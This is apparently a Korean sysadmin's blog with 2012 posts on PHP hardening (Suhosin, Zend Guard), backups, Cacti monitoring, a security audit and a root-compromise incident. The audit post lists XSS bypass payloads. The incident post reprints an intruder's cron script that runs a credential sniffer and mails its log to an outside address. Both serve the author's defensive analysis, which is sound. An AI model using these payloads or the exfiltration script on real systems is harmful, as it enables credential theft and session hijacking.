New Born

Diablo3

와닥 — Mon, 14 May 2012 21:13:32 +0900

준비는 끝났다...

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

GET 길이 제한

와닥 — Thu, 26 Apr 2012 07:30:00 +0900

버그 신고를 받고 확인해보니, 갑자기 잘되던... 약 한달전까지는 잘됐던 본인인증 모듈에서 오류가 난다.
아... 가만있다가 이건 또 웬... ㅠ 방치하고 있으면 우째 자꾸 이렇게 여기저기서 머가 터진다냥.

오류 페이지에서 직접 찍어보니 $_GET 이 안넘어오네, 브라우저에는 넘어왔는데...
ㅎㅎ 실소가 터져나온다, 거참 별일이 다 생기네.

본인인증 과정에서 브라우저에 넘어온 값은...

8C51EB8A5B3BBA384E7CE1143F09634B3C269CC1C560119287876C5F3779087D253A142F442C5971CC861F004040317A5E297D4591E271104D16254EEC0B8A41AB65D4D0CA7FB92FB71155347C8607451281F4CEAA66969700D5AFABB9432747160BCDB0E0B9C71FA9FD7C97EBFA57CD70CC5EDDBC5805E2F88BFB64D1976E4F6D44DBC90A9D04F74A9FE97BE4E4B0A9AFFFC7B62271D97823572FDC4EA89076F59F43A74A129DD5ED7335858E0434675951D6F1FE2A0AD006CFA55EB5F4C2D9D9A5697DA48536CE2B3B598889564C40C985C6C7B0135F8487B9536A8A530B084D988C15916BEB5A2825D6EA7E5F26CD65109BB3DE1B2357A2EC04FE9701221E3923173ADE1D0198482E665D5634EA81D3A0F13F5A0538F81272797A54AC254A9E4AFEB57377875229B0518C518BC51F8F65675259AF7C60308D6D3440CCB2ED28A965E37D00A144DFF0AB8F2BC78CEA14238349E826016C2201BE739737AD93

일단 GET 에 넘어온 값이 심상찮게 길다는 점.
길긴 하지만 본인인증 하는 모든 서버들이 이 길이의 값을 받을텐데 우리 서버의 문제겠지.
직접 찍어봤다. 혹시나 길어서 안넘어왔는가 하고.

12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012

512자 512byte 까지만 출력이 되고 513부터 출력되지 않는다. 빙고~
내 생각은 GET 값이 설정된 값보다 길 경우 값이 짤릴줄 알았는데, 아예 안넘어왔네.

근데 이게 대체 어디서 설정이 된거지.
그간에 한거라고는 해킹 사고 때문에 php 버전업, 수호신 설치...

php -i | grep get 으로 일단 검색..
suhosin.get.max_value_length 가 딱~
512 가 딱~
1024 로 딱~

수호신 기본 설정이 저 모양이었다는 점~
본인인증 때문에 패스워드 찾기가 거의 한달 동안 안됐었다는 점~
근데 버그 신고가 이제 들어왔다는 점~

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

Backup Schedule

와닥 — Fri, 20 Apr 2012 23:30:00 +0900

WEB DB Backup Schedule

웹서버1, DB서버1, 백업서버1 일때,
웹서버와 DB서버에 각각 로컬로 데이터를 백업하고, 백업서버에 동기화하기.

1. 웹서버 / DB서버 로컬 백업

주기적인 백업을 위해 쉘스크립트로 작성 후 cron 에 등록

- Work dir: /data

# vi /data/backup.sh

#!/bin/sh
# delete files 7 days later
find /data -mtime +7 -name 'oops4u_html_*' -exec rm -f {} \;
# website backup
tar czfP /data/oops4u_html_`date +%Y%m%d`.tar.gz /home/oops4u/www
# mysql backup
mysqldump -uroot -ppassword -A --skip-lock-tables > /data/oops4u_mysql_`date +%Y%m%d`.sql

/data 디렉토리에 수정된지 5일이 지나고 oops4u_ 로 시작하는 파일을 삭제. (현재부터 5일이 지난 백업파일을 삭제하라는 의미)
백업할 웹어플리케이션 디렉토리를 /data 디렉토리로 압축
mysql의 모든 데이터베이스를 /data 디렉토리에 sql로 저장

# vi /etc/crontab
10 5 * * * root /data/backup.sh

매일 오전 5시 10분에 백업 실행

2. 로컬에 저장된 백업 파일 원격 서버에 동기화

원격 동기화를 위해 rsync 와 ssh 를 사용.
접속시 패스워드를 입력하지 않기 위해 인증키 생성.

1. 로컬서버(웹/DB)에서 인증키 생성

# ssh-keygen -t rsa

2. 공개키 값 복사

# cat ~/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA3JihoTGqeF/ZUlCrPIC/03m6TS6pnbiMJyKccMYZTNm/1QRL/TqwLnd3Pb......

3. 접속할 원격서버(백업)에 공개키 붙여넣기

# vi ~/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA3JihoTGqeF/ZUlCrPIC/03m6TS6pnbiMJyKccMYZTNm/1QRL/TqwLnd3Pb......

(이미 생성되어 있을 경우 기존 내용 뒤에 추가)

4. 로컬서버에서 접속 확인

[root@oops ~]# ssh -l root -p 32 111.111.111.112

Last login: Thu Apr 19 16:29:35 2012 from 111.111.111.111

[root@oops-backup ~]#

5. 주기적인 백업 동기화를 위해 쉘스크립트 작성 후 cron 에 등록

Work dir: /data

# vi /data/backup_remote.sh
#!/bin/sh
HOME=/data/
DESTHOME=/data/
date
rsync -av \
-e 'ssh -l root -p 32' \
--delete \
--exclude='*.sh' \
$HOME 111.111.111.112:$DESTHOME

--delete 옵션은 로컬에서 삭제됐으면 원격에서도 삭제됨을 의미.
--exclude 옵션은 패턴에 부합하는 파일 및 디렉토리는 동기화 제외.
HOME 자료를 DESTHOME 으로 동기화.

# vi /etc/crontab
30 5 * * * root /data/backup_remote.sh >> /var/log/backup_remote

매일 오전 5시 30분에 원격백업 실행하고 로그 남김

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

SSH Mobile Free

와닥 — Wed, 18 Apr 2012 07:30:00 +0900

ssh 관련 문서 검색 중 모바일 터미널의 존재를 발견.

앱스토어에서 쓸만한 걸 찾아보다가 (쓸만한거 -> 무료) SSH Mobile Free 란 프로그램을 발견

[Site List] - [Add] - 서버정보입력 - [save]

오오 접속잘되고 오오...

그나저나 해킹당할 염려는 없으려나, 두..두려움...;

[Screen], [Misc] 등에서 터미널 관련 설정 및 배경색, 폰트 크기등을 정할 수 있음.

단순단말기를 뜻하는 dumb -> 가장 깔끔하게 나옴.

비상시를 대비하야 깔기는 했소만, 이걸 사용할 일이 벌어지지 않기를...

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

Cacti 그래프

와닥 — Fri, 13 Apr 2012 19:00:00 +0900

cacti 설치 후 처음 로그인을 하게 되면, 기본 세팅[Settings]에 이상이 없는지 확인해야 합니다.
Paths 에 [fail] 된 항목은 없는지, 디렉토리에 쓰기 권한 설정이 잘 되었는지.

1. 모니터링 할 장비 설정

[Management] - [Device] - [Add]
hostname 에 장비의 IP나 hostname 을 입력합니다.
Host Template 에 추가할 장비의 template 가 있다면 선택합니다. (자동으로 필요한 그래프를 생성합니다.)
SNMP Option 에서 Version1 을 선택하고 161 포트에 대해 방화벽을 개방합니다.
[Save] 버튼을 눌러 저장하고 상단의 [graphs] 버튼을 누르면 약 5분~10분 뒤 그래프를 확인할 수 있습니다.

2. 그래프 추가

[Management] - [Device] 에서 그래프를 추가하기 원하는 장비를 선택합니다.
[Add Graph Template] 에서 추가하고 싶은 그래프를 선택하고 [Add] 한 후 [Save] 저장합니다.

트래픽 그래프는 [Add Data Query] - [SNMP - Interface Statistics] 를 추가해야 하며,
장비에 snmpd 데몬이 활성화 되어 있어야 합니다.
상단에 [Create Graphs for this Host] 클릭 후,
트래픽을 확인할 interface와 graph type (In/Out Bytes with Total Bandwidth)등을 선택하고 [create]

3. 사용자 그래프 추가

[Data Input Methods] 에 이미 만들어진 데이터들은 perl 로 만들어져 있지만, php 로도 작성할 수 있습니다.
예로 당일 가입자를 구하는 쿼리를 만든다면 다음과 같이 출력하도록 만들어야 합니다.

# vi <path_cacti>/scripts/web_total_user.php
// 쿼리 생략
//
// 구분1:값1 구분2:값2 구분3:값3 ...
printf( "Total:%d Today:%d", $row['total'], $row['today'] );

파일 작성을 마쳤으면 데이터 입력 메소드를 추가합니다.
[Data Input Methods] - [Add]
[Name] - Web Join
[Input type] - Script/Command
[Input String] - php <path_cacti>/scripts/web_total_user.php
[Output Fields] : 여기에 소스 파일의 구분 값을 생성합니다. [Add] - Total / Today - [Save]

데이터 입력 메소드를 생성한 후에 데이터 템플릿을 추가합니다.
[Data Templates] - [Add]
[Data Input Method] - Web Join
[Data Source Item] : 여기도 소스 파일의 구분 값만큼 아이템을 생성합니다. [New] - Total / Today 각각 추가 - [Output Field] 각각 지정 - [Save]

그래프 템플릿을 추가합니다.
[Graph Templates] - [Add]
[Graph Template Items] - [Add]
[Data Source] - Web Join (Total)
[Graph Item Type] - 그래프 타입은 AREA / LINE 을 주로 사용, GPRINT 는 그래프 아래에 숫자 표기에 사용
[Consolidation Function] - 값의 평균(AVERAGE)/최대(MAX)/현재(LAST) 등을 선택할 수 있음
이렇게 [Data Source]를 Total 과 Today 각각 생성하고 [Save]

그래프 적용할 장비 선택 후 그래프 생성.

[Graph Trees] 에서는 그래프의 분류를 생성할 수 있고,
[Graph Management] 에서는 그래프를 분류에 할당할 수 있습니다.

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

Zend Guard

와닥 — Thu, 29 Mar 2012 00:10:00 +0900

Zend Optimizer 는 PHP 5.2 버전까지만 지원을 하므로 PHP 5.3 버전 부터는 Zend Guard 를 이용해야 합니다.
홈페이지에서 다운받아 서버에 올리고 설치 하도록 합니다.

Download : http://www.zend.com/en/products/guard/downloads

# tar zxvf ZendGuardLoader-php-5.3-linux-glibc23-x86_64.tar.gz
# cp ZendGuardLoader-php-5.3-linux-glibc23-x86_64/php-5.3.x/ZendGuardLoader.so /usr/local/php/modules/

# vi /etc/php.ini
[zend]
zend_extension=/usr/local/php/modules/ZendGuardLoader.so

설치 확인

# php -v
PHP 5.3.9 (cli) (built: Mar 26 2012 18:04:12)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
with Zend Guard Loader v3.3, Copyright (c) 1998-2010, by Zend Technologies
with Suhosin v0.9.33, Copyright (c) 2007-2012, by SektionEins GmbH

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

[보안] Suhosin

와닥 — Wed, 28 Mar 2012 18:37:20 +0900

PHP 를 위한 보안 강화 시스템.

http://www.hardened-php.net/suhosin/

install 방식은 patch 와 extension 이 있는데,

php 설치 전이라면 patch 방식, php 설치 후라면 extension 방식으로 설치하면 되겠습니다.

download : http://www.hardened-php.net/suhosin/download.html

Patch

php 버전에 맞는 suhosin-patch 파일 다운로드
php, suhosin-patch 압축해제
php 소스파일 패치
php 설치

# wget http://download.suhosin.org/suhosin-patch-5.3.9-0.9.10.patch.gz
# tar -xfj php-5.3.9.tar.bz2
# gunzip suhosin-patch-5.3.9-0.9.10.patch.gz
# cd php-5.3.9
# patch -p 1 -i ../suhosin-patch-5.3.9-0.9.10.patch

# ./configure --with-whatever-you-want [--enable-suhosin]
# make
# make install

Installing the Extension

# wget http://download.suhosin.org/suhosin-0.9.33.tgz
# tar zxvf suhosin-0.9.33.tgz
# cd suhosin-0.9.33
# phpize
# ./configure
# make
# make install

# vi /etc/php.ini
[suhosin]
extension_dir=/usr/local/php/lib/php/extensions/no-debug-non-zts-20090626/
extension=suhosin.so

설치 확인

# php -v
PHP 5.3.9 (cli) (built: Mar 26 2012 18:04:12)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
with Suhosin v0.9.33, Copyright (c) 2007-2012, by SektionEins GmbH

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

보안 검수

와닥 — Tue, 27 Mar 2012 18:55:46 +0900

1. XSS(Cross Site Scripting) 공격 발생 가능한 취약점.

2. DB 접근 제한.

3. Hash DoS 공격에 대한 취약점 확인.

1. XSS(Cross Site Scripting) 공격 발생 가능한 취약점

사이트 상에서 사용자의 입력을 받는 모든 페이지에 XSS 공격이 가능.
header, cookie, query, form 등에 대해 유효성 검사를 실시하고 사용자 입력 값에 대한 검증을 강화하여 방어.
burp suite 등의 proxy 툴을 이용하여 변조 테스트 가능.

일반적으로 사용자가 form 필드에 <script>alert("XSS Attack");</script> 를 입력했을 때,
의도한대로 alert 창이 띄워진다면 XSS 공격에 취약하다고 볼 수 있음.

공격 패턴

기본패턴 : <sCriPt>alErt(doCumEnt.coOkie)</ScriPt>
인코딩 패턴 : <scrip%00t>alert(2222)</scRi%00pT>
event handler 우회 패턴 : <img//src="something"//oneRRor='a=alert;b=dOcumEnt;a(b./**/cOokIe)'>
expression 우회 패턴 : <p+style='x:eXp/*xss*/resSion(alert(document.cookie))'></p>
HTML5 패턴 : <video src=1 onerror=alert('XSS3')>
Base64 인코딩 패턴 : <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnb2JqZWN0X3NjcmlwdF9hbGVydCcpPC9zY3JpcHQ+">

대응책

사용자 입력 필드 또는 검색어 필드에서 입력된 값에 HTML Entity 변환 및 16진수 변환등으로 코드 실행 방지와 black keyword 추가

htmlentities( a, ENT_QUOTES ) 혹은 replace( a, "<", "<" ) 사용.

2. DB 접근제한 조치

DB 외부 오픈 제한(ACL등), mysql 기본포트 변경 (3306->13306 등...)

대응책

# vi /etc/my.cnf
[mysqld]
port=13306

3. Hash DoS 공격에 대한 취약점 확인

PHP 버전이 낮아서 Hash DoS 공격의 가능성이 있다.
수정된 버전(PHP 5.4.0 RC 이상, PHP 5.3.9이상)을 사용할 것을 권고
max_input_vars 설정으로 파라미터의 수를 제한

PHP 보안 모듈(suhosin) 사용 (아래의 설정은 최대 파라미터 개수를 500개로 제한한 예시)
suhosin.post.max_value_lenth = 1000000
suhosin.post.max_vars = 500
suhosin.request.max_vars = 500

기존PHP버전 (완벽한 해결이 아닌 공격을 약화시키는 방법)

php.ini 설정값 변경 (아래의 값을 변경하여 공격을 완화할 수 있다. 수치는 default임 )
max_input_time = 60 (요청 데이터를 파싱하는데 걸리는 최대 시간)
post_max_size = 8M (POST 사이즈 제한)
=> 파일이 업로드 되는 서비스는 POST 사이즈가 크므로 post_max_size로 적용하기는 어렵고, max_input_time 만 설정해 볼 수 있다.

대응책

PHP 5.3.9 설치, suhosin 설치, php.ini 수정.

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

이 또한 지나가리라

와닥 — Wed, 21 Mar 2012 02:07:30 +0900

하루를 시간가는줄 모르게, 또 즐겁게 보낼 수 있다는 축복...이란 것이 내게도 잠시 머물렀지만,
그간 만들어 놓은 내 땀과 쌓아온 믿음을 한순간에 무력하게 만들어버리고 재만 남았구나.
동해 수심 30미터속에서 이내 죽어버릴 것 같았던 그 때는 발악하면서 살아보려고 발버둥이라도 쳤었는데,
이 잿더미를 본 순간 발버둥은 커녕 얼음이 되어 버렸다. 무엇을 할 수 있냐고 물었는데 뉴로에서 피드백이 없다.
심장은 터질것 같은데, 몸은 점점 굳어져 가는 느낌... 느껴본 사람이 있을까.

구원자에서 엑스맨으로, 해리포터에서 조빱으로, 이 집은 역시 내 집이 아닌 남의 집, 그 집의 3단 가시방석위에서 피 흘리는 나.
천국을 향해 등에 사람들 주렁주렁 매달고 구름 근처까지 올라갔는데, 난데없는 벼락 한방 제대로 맞고 추락.
추락사 했어야 되는데, 하늘에서 추락한건데... 살았네 지미... 그냥 죽이지 그랬냐. 만신창이 상태로 이걸 다시 올라가야 해?;
누구나 한번쯤 우는 거, 나도 한번 울었다고 생각하기에는 정말 너무x1E+31 재수없지 않니?
이건 도저히 말로 표현할 수 없다고 생각했는데 하루가 지나니 말문이 트인다. 아, 역시 시간이란 약은...

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.

Stolen ROOT

와닥 — Tue, 13 Mar 2012 01:02:00 +0900

1. 사건 시작

Logwatch 에 배달된 내용.

Mar 12 01:20:01 xxxx crond[21145]: User not known to the underlying authentication module
Mar 12 01:20:01 xxxx crond[21145]: CRON (cactiuser) ERROR: failed to open PAM security session: Success
Mar 12 01:20:01 xxxx crond[21145]: CRON (cactiuser) ERROR: cannot set security context
...

잉... 이건 뭐... 한참을 스크롤해 내려가는데,

Deleted Users:
test
cactiuser
bin

Deleted Groups:
test

Removed From Group:
user cactiuser from group cacti
user cactiuser from group cacti
user bin from group bin
user bin from group daemon
user bin from group sys
user bin from group bin
user bin from group daemon
user bin from group sys

컥... 당황한 나는 서버에 접속하여 su 권한으로 .bash_history 를 열어봅니다.

# vi .bash_history
/root/.bash_history: Permission denied

컥;;;

# ls -al

drwxr-x--- 7 0 root     4096 3월 12 01:31 .
drwxr-xr-x 24 0 root     4096 3월 8 12:57 ..
-rw------- 1 0 root    15436 3월 9 12:53 .bash_history
-rw-r--r-- 1 0 root       24 1월 6 2007 .bash_logout
-rw-r--r-- 1 0 root      307 1월 30 10:48 .bash_profile
-rw-r--r-- 1 0 root      176 1월 6 2007 .bashrc

root 사용자 자리에 0...
서버의 모든 root 소유 파일과 디렉토리는 저 모양으로 바뀌었고, root 로는 아무것도 할 수가 없었습니다.
그나마 다행은 다른 계정들은 무사.

log들 확인하려 했더니 삭제되고 없고 ( messages, maillog, boot.log )
secure 에서 찾은 이미 확인한 로그...

Mar 12 01:16:43 xxxx userdel[21122]: delete user `test'
Mar 12 01:16:43 xxxx userdel[21122]: removed group `test' owned by `test'
Mar 12 01:16:48 xxxx userdel[21127]: delete user `cactiuser'
Mar 12 01:16:48 xxxx userdel[21127]: delete `cactiuser' from group `cacti'
Mar 12 01:16:48 xxxx userdel[21127]: delete `cactiuser' from shadow group `cacti'
Mar 12 01:29:56 xxxx userdel[28380]: delete user `bin'
Mar 12 01:29:56 xxxx userdel[28380]: delete `bin' from group `bin'
Mar 12 01:29:56 xxxx userdel[28380]: delete `bin' from group `daemon'
Mar 12 01:29:56 xxxx userdel[28380]: delete `bin' from group `sys'
Mar 12 01:29:56 xxxx userdel[28380]: delete `bin' from shadow group `bin'
Mar 12 01:29:56 xxxx userdel[28380]: delete `bin' from shadow group `daemon'
Mar 12 01:29:56 xxxx userdel[28380]: delete `bin' from shadow group `sys'

일단 root 계정 확인해보고

# id root
uid=4294967295(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

뭔가 저 uid는...

# vi /etc/passwd
root:x:-1:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin

bin 은 삭제되서 온데간데 없고, root 는 uid 가 -1...
하지만 권한이 없어서 수정할 수가 없습니다. ㅠ

2. 해결

sudo 권한을 가진 일반 계정으로 접속하여, passwd 파일 접근 후 root uid 수정.

$ sudo vi /etc/passwd
root:x:-1:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash

다행히 수정이 되었습니다ㅠ
bin(1) cactiuser 도 새로 생성하고 그룹지정을 잘 해줬습니다.
iptables 설정 후 syslogd 재부팅하고 나서 때마침 root로 날아온 메일.

/etc/cron.daily/0logwatch:

Who are you?
/etc/cron.daily/dnsquery:

./popauth: error while loading shared libraries: libdb.so.3: cannot open shared object file: No such file or directory
mkdir: cannot create directory `/usr/share/misc/': File exists
mkdir: cannot create directory `/usr/share/misc/blah/': File exists
Who are you?
popauth: no process killed
popauth: error while loading shared libraries: libdb.so.3: cannot open shared object file: No such file or directory
/etc/cron.daily/logrotate:

error: stat of /var/log/messages failed: No such file or directory
error: stat of /var/log/maillog failed: No such file or directory
error: stat of /var/log/boot.log failed: No such file or directory

--q2CNvx1S006556.1331596695/xxxx--

머냐 이건; 이 메일 안왔으면 어쩔뻔했냐...

# ls -al /etc/cron.daily/dnsquery
-rwxr-xr-x 1 1000 users 346 4월 15 2012 dnsquery

어이구, 이분은 미래에서 오셨구만...

# vi /etc/cron.daily/dnsquery

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
mkdir /usr/share/misc/
mkdir /usr/share/misc/blah/
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail ov1del@yahoo.com -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

저 메일 주인분이 범인...

# find / -group users -exec ls -al {} \;
-rwxr-xr-x 1 1000 users 388262 4월 15 2012 /usr/lib/popauth
-rwxr-xr-x 1 1000 users 1092 4월 15 2012 /usr/local/lib/dsniff.services
-rw-r--r-- 1 1000 users 2824 12월 5 2010 /usr/local/src/cacti-0.8.7i-PIA-3.1/...

users 그룹의 파일들을 찾아보니
저분이 만들어 놓은 파일들과 cacti 의 압축 풀었던 디렉토리가 1000:users 인 것을 확인하고 바로 디렉토리 삭제;

3. 마무리

어떻게 뚫린건지는 모르겠습니다. 사실 뚫릴거라고 생각하고 있던 서버중에 하나이기도 합니다.
일단 의심스러운 파일들은 모조리 삭제했지만, iptables 미설정 때문이라면 오히려 속편하겠습니다.
iptables 설정 후에도 이와 같은 해킹이 일어난다면 난 더이상 할 수 있는게 없습니다 ㅠ

크리에이티브 커먼즈 라이선스

이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-동일조건변경허락 2.0 대한민국 라이선스에 따라 이용하실 수 있습니다.